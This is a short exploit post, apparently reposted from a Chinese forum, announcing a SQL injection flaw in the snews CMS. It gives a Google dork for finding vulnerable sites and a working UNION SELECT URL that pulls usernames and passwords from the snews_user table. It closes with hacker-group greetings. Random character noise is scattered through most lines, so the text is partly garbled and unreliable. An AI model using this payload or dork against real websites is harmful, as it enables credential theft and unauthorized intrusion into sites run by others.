标题: CMS snews SQL Injection Vulnerability
/ B" b/ W' O5 F' V% n+ i作者: By onestree9 M$ j8 ?8 S$ j, t0 G/ g Z; x
下载地址 : http://snewscms.com/
& N) h+ f+ c2 o# G0 |测试平台 : ubuntu 12.10 / win 75 Y9 a. G# i$ o" y2 b- q* M; B
关键词: inurl:"tanyakan pada rumput yang bergoyang"
) [2 ]$ ?# j3 ~ x9 x+ T3 |1 ]- q
7 G9 L# H3 d. D' K ( }5 k) f( b/ [ v- e2 S3 `
************************************************************** b1 P* v! @3 @
: C' S& h* F9 p5 T; h- ]SQL poc:
! |3 V( Y+ ?/ d
7 D& N0 k8 {( X. F) Phttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]8 k3 U& g+ Y* G/ A7 m
! E* K+ T4 \: W" l" [示例
! P% B5 L4 b8 e - `% N; `' ^0 H+ T! S
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*1 G v9 t7 M( s. `8 G+ c1 t \
! l; t- Y1 m; u: `+ z0 |$ B
1 u1 Q1 ~( t5 c5 w3 a
致谢:% x, P7 k9 p4 \2 S( }8 v" \
* Q: i+ @; u) U, J* H3 T
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
# p# g; M T0 y1 ?' l1 z$ J
/ N, m% m {$ e/ i- i/ C indonesiancoder - moeslimh4x0r - go-coder- J7 Z Z: I, A- T3 x0 ?: @
W# V0 L2 C i2 Espesial my hunny :*3 u) e; Z. H4 x: R$ h. }( _
|